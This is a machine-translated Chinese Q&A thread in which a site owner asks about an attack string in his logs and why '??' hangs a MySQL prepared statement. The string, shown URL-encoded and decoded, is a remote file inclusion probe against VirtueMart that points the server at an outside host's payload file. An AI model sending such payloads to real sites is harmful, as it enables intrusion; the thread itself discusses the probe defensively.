我最近对我的网站发起了攻击,攻击者试图通过添加以下字符串来改变我的一个SQL语句
%2f%2fcomponents%2fcom%5fvirtuemart%2fshow%5fimage%5fin%5fimgtag%2ephp%3fmosConfig%5fabsolute%5fpath%3dhttp%3a%2f%2fwww%2ekwangsung%2ees%2ekr%2f%2fUserFiles%2fshirohige%2fzfxid%2etxt
到一个值。
无论如何,我不使用PHP或其他任何事情,但是,%3f%3f引起了一个问题:在MySQL准备语句调用中,双重挂起。
其他人之前遇到过双重问题?我检查了MySQL网站,但没有找到任何东西。
答案 0 :(得分:1)
这不是SQL注入攻击,它似乎是一个调查,看你是否容易受到某种“virtmart”漏洞的攻击。</ p>
//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt
无论使用何种语言,都不应将任意GET数据传递给SQL查询。您需要实现某种类型的服务器端验证,并确保您的查询正确地转义所有用户定义的输入。
答案 1 :(得分:0)
抱歉,我使用未注册的帐户在其他地方的其他浏览器上发布了此问题。
我确实在我收录的字符串末尾忘记了%3f%3f。
不,这不是注入攻击,它是对我不使用的某些PHP程序的一些攻击,但攻击者还是试过了。
我正在使用C ++绑定到MySQL,在堆栈中向下。准备语句以“??”挂起我可以通过其他查询验证这一点,而不仅仅是我通过攻击获得的查询。
我正在接受输入并将其放入查询中,但我的平台会自动转义所有CGI输入的&lt;&gt;&amp;“'字符,而我正在其他位置进行其他检查以进行注入。这实际上是遗留代码。较新版本的平台只允许参数化的SQL,并且只能通过RPC访问数据库,因此您只能访问RPC公开的某些表和行。所以从技术上讲,我不会再遇到这个问题,但我仍然很好奇为什么“??”似乎挂了。
感谢。